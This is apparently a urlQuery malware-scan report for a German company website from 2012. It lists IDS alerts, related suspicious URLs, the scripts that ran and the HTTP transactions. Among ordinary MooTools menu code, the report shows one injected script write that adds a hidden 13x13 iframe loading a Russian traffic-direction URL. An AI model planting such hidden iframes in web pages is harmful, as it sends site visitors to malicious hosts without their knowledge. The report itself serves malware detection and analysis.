Overview

URLhttp://www.doldgmbh.de/
IP80.237.132.213
ASNAS20773 Host Europe GmbH
Location Germany
Report completed2012-11-08 01:56:15 CET
StatusLoading report..
urlQuery Alerts Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 01:55:36 213.186.33.4 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 80.237.132.213

Date Alerts / IDS URL IP
2012-12-07 08:34:060 / 1http://soi10.de/7KyeE6FV/index.html80.237.132.213
2012-12-07 08:34:030 / 1http://soi10.de/SLVH42WX/index.html80.237.132.213

Last 6 reports on ASN: AS20773 Host Europe GmbH

Date Alerts / IDS URL IP
2013-02-17 15:32:570 / 0http://www.haraldtrauernicht.de/80.237.133.137
2013-02-17 13:40:310 / 2http://www.hotelthier.at/.sys/?getexe=fb.75.exe80.237.132.245
2013-02-17 13:40:300 / 3http://www.hotelthier.at/.sys/?getexe=go.exe80.237.132.245
2013-02-17 13:07:250 / 1http://www.haarverlaengerung-wuppertal.de/pctbw/i45zjtme4ytl5p0b0bw8.5p1?pu7hpm2s46wyrjx0u5g3jt (...)178.77.75.96
2013-02-17 12:49:110 / 3http://daysinparadise.at/.sys/?getexe=loader.exe88.80.208.170
2013-02-17 12:46:470 / 2http://www.hotelthier.at/.sys/?getexe=loader.exe80.237.132.245



JavaScript

Executed Scripts (9)


Executed Evals (2)

#1 JavaScript::Eval (size: 617, repeated: 1)

Element.extend({
    bgiframe: function(styles) {
        if (window.ie6) {
            if (!this.getElement('iframe.bgiframe')) {
                styles = styles || {};
                var ifsrc = $pick(styles.src, 'javascript:false');
                delete styles.src;
                var ifopac = $pick(styles.opacity, true);
                delete styles.opacity;
                (new Element('iframe', {
                    'class': 'bgiframe',
                    frameborder: 0,
                    tabindex: -1,
                    src: ifsrc,
                    styles: $merge({
                        top: -this.getStyle('borderTopWidth').toInt(),
                        left: -this.getStyle('borderLeftWidth').toInt(),
                        width: this.offsetWidth,
                        height: this.offsetHeight
                    }, styles, {
                        display: 'block',
                        position: 'absolute',
                        zIndex: -1,
                        filter: ifopac ? "Alpha(Opacity='0')" : ''
                    })
                })).injectBefore(this.firstChild)
            }
        }
        return this
    }
});

#2 JavaScript::Eval (size: 1969, repeated: 1)

var HxDMenu = new Class({
    options: {
        bgiframe: true,
        hoverClass: 'sfHover',
        delay: 500,
        animate: {
            props: ['opacity', 'height'],
            opts: Class.empty
        }
    },
    initialize: function(b, c) {
        this.setOptions(c);
        if (window.ie6) this.options.delay = 50;
        this.element = $(b);
        this.element.getElements('li').each(function(a) {
            a.addEvents({
                'mouseover': this.over.bind(this, a),
                'mouseout': this.out.bind(this, a)
            })
        }, this)
    },
    over: function(b) {
        $clear(b.sfTimer);
        if (!b.hasClass(this.options.hoverClass)) {
            if (window.ie6) {
                var c = b.getProperty('class').split(" ");
                var d = this.options.hoverClass;
                c = c.filter(function(y) {
                    return !y.test("-" + d)
                });
                c.each(function(a) {
                    if (b.hasClass(a)) b.addClass(a + "-" + d)
                }, this);
                var e = c.join("-") + "-" + d;
                if (!b.hasClass(e)) b.addClass(e)
            }
            b.addClass(this.options.hoverClass);
            var f = b.getElement('ul');
            if (f) {
                if (this.options.bgiframe) f.bgiframe({
                    opacity: false
                });
                f.animate(this.options.animate)
            }
            b.getSiblings().each(function(a) {
                a.removeClass(this.options.hoverClass)
            }, this)
        }
    },
    out: function(e) {
        var f = this.options.hoverClass;
        e.sfTimer = (function() {
            if (window.ie6) {
                var b = e.getProperty('class').split(" ");
                b = b.filter(function(y) {
                    return y.test("-" + f)
                });
                b.each(function(a) {
                    if (e.hasClass(a)) e.removeClass(a)
                }, this);
                var c = b.join("-") + "-" + f;
                if (!e.hasClass(c)) e.removeClass(c)
            }
            e.removeClass(f);
            var d = e.getElement('iframe');
            if (d) d.remove()
        }).delay(this.options.delay, this)
    }
});
HxDMenu.implement(new Options);
Element.extend({
    animate: function(b) {
        if (!this.Fx) {
            this.Fx = this.effects(b.opts);
            this.now = this.getStyles.apply(this, b.props);
            this.FxEmpty = {};
            for (var i in this.now) this.FxEmpty[i] = 0
        }
        if (b.props.contains('height') || b.props.contains('width')) {
            this.setStyle('overflow', 'hidden');
            this.getParents('ul').each(function(a) {
                a.setStyle('overflow', 'visible')
            })
        }
        this.Fx.set(this.FxEmpty).start(this.now)
    },
    getParents: function(a) {
        var b = [];
        var c = this.getParent();
        while (c && c !== document) {
            if (c.getTag().test(a)) b.push(c);
            c = c.getParent()
        }
        return b
    },
    getSiblings: function() {
        var a = this.getParent().getChildren();
        a.splice(a.indexOf(this), 1);
        return a
    }
});

Executed Writes (1)

#1 JavaScript::Write (size: 149, repeated: 5)

<iframe src="http://guessworkhiking.ru/maxstacksizedetracted.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>


HTTP Transactions (38)


Request Response
GET / HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Set-Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; path=/ lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ jfcookie[lang]=en; expires=Fri, 09-Nov-2012 00:55:33 GMT; path=/
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 08 Nov 2012 00:55:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /modules/mod_hxdmoomenu/assets/js/hxdmoomenu.js HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 00:42:16 GMT
Etag: &quot;b844afbe-80c-4cdf11b59e189&quot;
Accept-Ranges: bytes
Content-Length: 2060
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /modules/mod_briaskISS/mod_briaskISS.css HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:35:07 GMT
Etag: &quot;e81705c8-22d-499bb395b190f&quot;
Accept-Ranges: bytes
Content-Length: 557
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /media/system/js/caption.js HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 00:42:16 GMT
Etag: &quot;780e17db-90f-4cdf11b552e5f&quot;
Accept-Ranges: bytes
Content-Length: 2319
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /modules/mod_briaskISS/mod_briaskISS.js HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 00:42:16 GMT
Etag: &quot;e8172095-e67-4cdf11b5954e8&quot;
Accept-Ranges: bytes
Content-Length: 3687
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /modules/mod_hxdmoomenu/assets/css/hxdmoomenu.css HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:35:12 GMT
Etag: &quot;b0509eb0-1869-499bb39a8bd45&quot;
Accept-Ranges: bytes
Content-Length: 6249
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /modules/mod_hxdmoomenu/assets/js/mootools.bgiframe.js HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 00:42:16 GMT
Etag: &quot;b844afc0-46d-4cdf11b59e189&quot;
Accept-Ranges: bytes
Content-Length: 1133
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /templates/doldgmbh/css/doldgmbh.css HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Wed, 31 Oct 2012 09:39:42 GMT
Etag: &quot;b8454338-1d12-4cd57aea1ceae&quot;
Accept-Ranges: bytes
Content-Length: 7442
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /components/com_joomfish/images/flags/en.gif HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Mon, 07 Feb 2011 14:40:58 GMT
Etag: &quot;901c8fe2-281-49bb2385b3562&quot;
Accept-Ranges: bytes
Content-Length: 641
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /components/com_joomfish/images/flags/de.gif HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Mon, 07 Feb 2011 14:40:58 GMT
Etag: &quot;901c8fde-233-49bb2385ae741&quot;
Accept-Ranges: bytes
Content-Length: 563
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /templates/doldgmbh/images/doldgmbh-logo.gif HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Wed, 18 Jan 2012 08:51:48 GMT
Etag: &quot;e0ae7555-26be-4b6c98ee31afc&quot;
Accept-Ranges: bytes
Content-Length: 9918
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /media/system/js/mootools.js HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 00:55:33 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 00:42:16 GMT
Etag: &quot;780e01c9-1236a-4cdf11b57dde5&quot;
Accept-Ranges: bytes
Content-Length: 74602
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /templates/doldgmbh/images/navi-languageback.gif HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/templates/doldgmbh/css/doldgmbh.css
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:39:49 GMT
Etag: &quot;e0ae7559-69-499bb4a338e0b&quot;
Accept-Ranges: bytes
Content-Length: 105
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/stories/home/animation/04-habitacle.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:36 GMT
Etag: &quot;600cf4a3-4104-499bb1aef7440&quot;
Accept-Ranges: bytes
Content-Length: 16644
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /templates/doldgmbh/images/backmain.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/templates/doldgmbh/css/doldgmbh.css
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Fri, 17 Jun 2011 16:18:56 GMT
Etag: &quot;e0ae7554-cfe0-4a5eabe159653&quot;
Accept-Ranges: bytes
Content-Length: 53216
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/stories/home/animation/01-voiture.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:35 GMT
Etag: &quot;600cf4a0-4f3e-499bb1ae14b07&quot;
Accept-Ranges: bytes
Content-Length: 20286
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/stories/home/animation/02-syscoldirection.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:36 GMT
Etag: &quot;600cf4a1-31c6-499bb1ae561f8&quot;
Accept-Ranges: bytes
Content-Length: 12742
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/stories/home/animation/05-liaisons.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:36 GMT
Etag: &quot;600cf4a4-3d64-499bb1af417d2&quot;
Accept-Ranges: bytes
Content-Length: 15716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /images/stories/home/animation/06-moteur.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:37 GMT
Etag: &quot;600cf4a5-34f9-499bb1af8daa5&quot;
Accept-Ranges: bytes
Content-Length: 13561
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/stories/home/animation/03-chassisstructure.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:36 GMT
Etag: &quot;600cf4a2-49fa-499bb1aea828c&quot;
Accept-Ranges: bytes
Content-Length: 18938
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/stories/home/animation/07-transmission.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:26:37 GMT
Etag: &quot;600cf4a6-3a0b-499bb1afc64f3&quot;
Accept-Ranges: bytes
Content-Length: 14859
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /templates/doldgmbh/images/leftback.png HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/templates/doldgmbh/css/doldgmbh.css
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 14:39:49 GMT
Etag: &quot;e0ae7557-7b-499bb4a31a9a3&quot;
Accept-Ranges: bytes
Content-Length: 123
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /templates/doldgmbh/images/aktuelles-homeback.jpg HTTP/1.1

Host: www.doldgmbh.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/templates/doldgmbh/css/doldgmbh.css
Cookie: 93c638a3e556d8e9b1fc68f613446305=2a0r1egphjcogphu0otubbmal2; jfcookie[lang]=en
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 00:55:34 GMT
Server: Apache
Last-Modified: Fri, 17 Jun 2011 13:15:29 GMT
Etag: &quot;e0ae754a-1b29-4a5e82df7657f&quot;
Accept-Ranges: bytes
Content-Length: 6953
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /medias/player_flv_multi.swf HTTP/1.1

Host: flv-player.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Set-Cookie: 240plan=R496455207; path=/; expires=Sat, 10-Nov-2012 13:09:06 GMT
Date: Thu, 08 Nov 2012 00:55:36 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 27 May 2011 21:02:06 GMT
Etag: &quot;148cb2a-3f10-4a448400c6f80&quot;
Accept-Ranges: bytes
Content-Length: 16144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /maxstacksizedetracted.cgi?8 HTTP/1.1

Host: guessworkhiking.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.doldgmbh.de/
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 00:58:00 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Fri, 09-Nov-2012 00:57:58 GMT; path=/; domain=guessworkhiking.ru
Location: http://www.thelocal.de/
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 155
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

